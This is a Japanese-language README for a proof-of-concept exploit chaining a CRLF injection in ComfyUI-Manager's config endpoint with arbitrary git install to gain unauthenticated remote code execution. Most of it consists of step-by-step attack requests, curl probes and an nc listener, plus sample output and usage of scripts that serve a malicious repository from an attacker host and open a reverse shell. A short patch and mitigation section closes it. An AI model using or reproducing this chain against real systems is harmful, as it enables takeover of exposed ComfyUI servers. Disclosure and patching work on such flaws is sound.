
ComfyUI-ManagerのconfigエンドポイントにおけるCRLFインジェクションと任意のgitインストールを連鎖させ、未認証のリモートコード実行を実現する概念実証エクスプロイト。
深刻度: クリティカル (CVSS 9.8) 影響を受けるバージョン: ComfyUI-Manager < 3.39.2 および 4.0.0 - 4.0.4 修正済み: ComfyUI-Manager 3.39.2 / 4.0.5 連鎖する脆弱性: CVE-2025-67303 (任意のGitインストール -> コード実行)
ComfyUI-Managerは /api/manager/db_mode エンドポイントを公開しており、value クエリパラメータを受け取り、Pythonの configparser を使ってそれを直接 config.ini に書き込みます。
この脆弱性は ベアキャリッジリターンインジェクション (\r / %0D) です:
configparser は値をそのままシリアライズします — \r はファイルにそのまま保存されます。\r を改行文字として扱い、1つの値を2つの別々のINIディレクティブに分割します。strict=False (ComfyUI-Managerのデフォルト) の configparser は重複キーを受け入れ、最後のものを使用します。インジェクトされた security_level = weak が正規の値を上書きします。再起動後、偽造された設定が有効になり、/api/customnode/install/git_url (CVE-2025-67303) の認証ゲートが無効化されます。このエンドポイントは任意のgitリポジトリをクローンし、その中の install.py をサブプロセスとして即座に実行します — これにより、未認証の攻撃者が完全なコード実行を達成できます。
Step 1 — configエンドポイントにベアCRをインジェクト
GET /api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak
書き込み後のディスク上のconfig.ini:
db_mode = cache\r
security_level = weak <- %0D経由でインジェクト
Step 2 — Managerを再起動して偽造設定を再読み込み
GET /api/manager/reboot
Managerがconfig.iniを読み戻す; ユニバーサル改行が値を分割;
最後のキーが優先 -> security_level = weak
Step 3 — ゲートを検証 (403が400に変わるまでポーリング)
POST /api/customnode/install/git_url body: http://127.0.0.1/probe.git
403 = ゲートはまだ閉じている
400 = ゲートが開いた、security_level=weakが確認された
Step 4 — 悪意のあるgitリポジトリからのインストールをトリガー (CVE-2025-67303)
POST /api/customnode/install/git_url
body: http://ATTACKER:9099/alg-upscaler.git
Managerの動作:
git clone http://ATTACKER:9099/alg-upscaler.git
python install.py <- ここでリバースシェルが実行される
| ファイル | 目的 |
|---|---|
setup_evil_repo.sh | 悪意のあるgitリポジトリを構築し、HTTP経由で配信する |
exploit_ad15.sh | チェーン全体を実行: CRLFインジェクト -> 再起動 -> 検証 -> トリガー |
autopwn.py | Pythonオールインワン代替 (リポジトリ構築 + チェーン全体実行) |
Step 1 — バージョンフィンガープリント
curl -s http://TARGET:8188/api/manager/version
# 脆弱: "3.39.1" / "4.0.3"
# 修正済: "3.39.2" / "4.0.5"
Step 2 — CRLFエンドポイントが値を受け入れることを確認
curl -v "http://TARGET:8188/api/manager/db_mode?value=test" 2>&1 | grep "< HTTP"
# HTTP/1.1 200 -> エンドポイントが存在し、書き込み可能
Step 3 — インストールゲートをプローブ
curl -s -o /dev/null -w "%{http_code}" \
-X POST http://TARGET:8188/api/customnode/install/git_url \
-d "http://127.0.0.1/probe.git"
# 403 -> ゲート閉 (デフォルト設定、ターゲットはインジェクト可能)
# 400 -> ゲートはすでに開いている (Phase 1をスキップ)
============================================================
CVE-2026-22777 + CVE-2025-67303 Full Chain
============================================================
Target : http://192.168.1.10:8188
Attacker : 10.10.14.1:4444
Evil repo : http://10.10.14.1:9099/alg-upscaler.git
[*] Phase 0: Version fingerprint
ComfyUI-Manager version: "3.39.1" <- 脆弱
[*] Phase 1: CRLF inject -> security_level = weak
[+] Injection sent (HTTP 200)
config.ini now contains:
db_mode = cache\r
security_level = weak <- ベアCR経由でインジェクト
[*] Phase 2: Trigger reboot
[+] Reboot request sent -- waiting 30s for Manager to restart...
[*] Phase 3: Verify security gate
Attempt 1: HTTP 403 <- まだ再起動中
Attempt 2: HTTP 403
Attempt 3: HTTP 400 <- ゲート開
[+] Gate OPEN -- security_level=weak is active
[*] Phase 4: Checking evil git repo is reachable
[+] Evil repo reachable (HTTP 200)
[*] Phase 5: Triggering git install (CVE-2025-67303)
ComfyUI-Manager will:
1. git clone http://10.10.14.1:9099/alg-upscaler.git
2. cd into cloned dir
3. python install.py <- ここでリバースシェルが実行される
Phase 5のcurlはハングします — リバースシェルは nc -lvnp 4444 に到達します。
| Vulhub PoC | このPoC | |
|---|---|---|
install.py | touch /tmp/success (実行の証明のみ) | 攻撃者へのPythonリバースシェル |
| 結果 | インタラクティブシェルなし | 完全なインタラクティブシェル |
| Vulhub PoC | このPoC | |
|---|---|---|
| 言語 | 単一のPythonファイル | Bash、2つの別々のスクリプト |
| クリーンアップ | tempfile.TemporaryDirectory (Ctrl+Cで自動削除) | 手動 (ディスクに残る) |
| リポジトリ名 | ランダム (例: evil-node-a1b2c3) | 固定: alg-upscaler |
| Vulhub PoC | このPoC | |
|---|---|---|
| CVE-2026-22777 (CRLFインジェクト) | 含まれない | exploit_ad15.sh Phase 1に含まれる |
| 再起動 + ゲート検証 | 含まれない | 30秒待機して403->400をポーリング |
| インストールのトリガー | 手動curl | Phase 5で自動化 |
Step 1 — 悪意のあるリポジトリとリスナーのセットアップ (2つのターミナル)
# Terminal 1 — listener
nc -lvnp 4444
# Terminal 2 — build and serve evil repo
bash setup_evil_repo.sh 10.10.14.1 4444
Step 2 — エクスプロイトチェーン全体を実行
# Terminal 3
bash exploit_ad15.sh 192.168.1.10 10.10.14.1 4444
Phase 5の後、Terminal 1にシェルが到達します。
代替 — Pythonオールインワン
# Blind command
python3 autopwn.py http://192.168.1.10:8188 --command "id"
# Reverse shell
python3 autopwn.py http://192.168.1.10:8188 --revshell --lhost 10.10.14.1 --lport 4444
アップグレード (推奨): ComfyUI-Manager 3.39.2 または 4.0.5+。
パッチは、クエリパラメータを config.ini に書き込む前に \r と \n を除去します。
ネットワーク緩和策 (即時のパッチ適用が不可能な場合):
8188 への外部アクセスをブロックする — ComfyUIは公開を想定して設計されていません。/api/manager/* および /api/customnode/* の前に認証付きリバースプロキシを配置する。config.ini を読み取り専用にする: chmod 444 config.ini。